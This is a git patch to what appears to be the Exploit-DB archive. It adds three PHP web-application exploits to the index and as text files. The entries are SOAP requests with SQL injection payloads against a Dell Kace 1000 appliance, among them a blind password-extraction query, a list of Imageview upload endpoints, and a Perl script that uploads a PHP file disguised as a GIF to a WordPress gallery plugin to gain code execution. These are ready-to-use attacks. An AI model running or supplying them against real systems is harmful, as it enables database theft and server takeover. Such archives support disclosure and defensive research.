From 0f85105335290427f6a7be453f6bf0bcf7152725 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sun, 20 Dec 2015 05:02:08 +0000
Subject: [PATCH] DB: 2015-12-20

3 new exploits
---
 files.csv                       |  3 ++
 platforms/php/webapps/39057.txt | 57 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/39058.txt | 10 ++++++
 platforms/php/webapps/39059.txt | 32 ++++++++++++++++++
 4 files changed, 102 insertions(+)
 create mode 100755 platforms/php/webapps/39057.txt
 create mode 100755 platforms/php/webapps/39058.txt
 create mode 100755 platforms/php/webapps/39059.txt

diff --git a/files.csv b/files.csv
index 55d98c1fa..2604fec23 100755
--- a/files.csv
+++ b/files.csv
@@ -35223,6 +35223,7 @@ id,file,description,date,author,platform,type,port
 38959,platforms/generator/shellcode/38959.py,"Windows XP-10 - Null-Free WinExec Shellcode (Python)",2015-12-13,B3mB4m,generator,shellcode,0
 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - (productdtl.php_ prodid param) SQL Injection Vulnerability",2015-12-14,"Rahul Pratap Singh",php,webapps,80
 38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80
+39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection Vulnerabilities",2014-01-13,"Rohan Stelling",php,webapps,0
 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 CPU Command Module (MSF)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102
 38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0
 38969,platforms/multiple/dos/38969.txt,"Adobe Flash Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0
@@ -35310,3 +35311,5 @@ id,file,description,date,author,platform,type,port
 39054,platforms/windows/dos/39054.txt,"Adobe Flash TextField.tabIndex Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
 39055,platforms/windows/dos/39055.txt,"Adobe Flash MovieClip.attachMovie - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
 39056,platforms/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39058,platforms/php/webapps/39058.txt,"Imageview 'upload.php' Arbitrary File Upload Vulnerability",2014-01-21,"TUNISIAN CYBER",php,webapps,0
+39059,platforms/php/webapps/39059.txt,"WordPress Global Flash Gallery Plugin 'swfupload.php' Arbitrary File Upload Vulnerability",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0
diff --git a/platforms/php/webapps/39057.txt b/platforms/php/webapps/39057.txt
new file mode 100755
index 000000000..dfb5540f0
--- /dev/null
+++ b/platforms/php/webapps/39057.txt
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/65029/info
+
+Dell Kace 1000 Systems Management Appliance is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Dell Kace 1000 Systems Management Appliance 5.4.76847 is vulnerable; other versions may also be affected. 
+
+Proof of Concept
+Page: /service/kbot_service.php
+Web method: getUploadPath
+Parameter: macAddress
+PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
+POST /service/kbot_service.php HTTP/1.1
+Accept-Encoding: gzip,deflate
+Host: www.example.com
+SOAPAction: "urn:#getUploadPath"
+Content-Length: 543
+
+<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/">
+         <macAddress xsi:type="xsd:string">' or '1'='1</macAddress>
+         <filename xsi:type="xsd:string">test</filename>
+      </urn:getUploadPath>
+   </soapenv:Body>
+</soapenv:Envelope>
+Page: /service/kbot_service.php
+Web method: getKBot
+Parameter: macAddress
+PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
+POST /service/kbot_service.php HTTP/1.1
+Accept-Encoding: gzip,deflate
+Host: www.example.com
+Content-Type: text/xml;charset=UTF-8
+SOAPAction: "urn:#getKBot"
+Content-Length: 553
+
+<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/">
+         <macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress>
+      </urn:getKBotConfig>
+   </soapenv:Body>
+</soapenv:Envelope>
+The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication:
+Page: /userui/advisory_detail.php
+PoC: http://www.example.com/userui/advisory_detail.php?ID=9-2
+Notes: Requires Authentication
+Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
+Parameter: ORDER[]
+Notes: Requires Authentication
+Page: /userui/ticket.php?ID=86
+Parameter: ID
+Notes: Requires Authentication
diff --git a/platforms/php/webapps/39058.txt b/platforms/php/webapps/39058.txt
new file mode 100755
index 000000000..234518cb4
--- /dev/null
+++ b/platforms/php/webapps/39058.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/65059/info
+
+Imageview is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+Imageview 6.x are vulnerable; other versions may also be affected. 
+
+http://www.example.com/photos/upload.php
+http://www.example.com/Galerie/upload.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/39059.txt b/platforms/php/webapps/39059.txt
new file mode 100755
index 000000000..dbae9aea1
--- /dev/null
+++ b/platforms/php/webapps/39059.txt
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/65060/info
+
+The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+#! /usr/bin/perl
+  use LWP;
+  use HTTP::Request::Common;
+  
+  my ($url, $file) = @ARGV;
+  
+  my $ua = LWP::UserAgent->new();
+  my $req = POST $url,
+    Content_Type => 'form-data',
+    Content =>    [
+  name => $name,
+  galleryselect => 1, # Gallery ID (popup.php)
+  Filedata => [ "$file", "file.php.gif",  Content_Type =>
+  'image/gif' ]
+            ];
+  my $res = $ua->request( $req );
+  if( $res->is_success ) {
+    print $res->content;
+  } else {
+    print $res->status_line, "\n";
+  }
+
+--------------------
+Example URI:
+--------------------
+http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php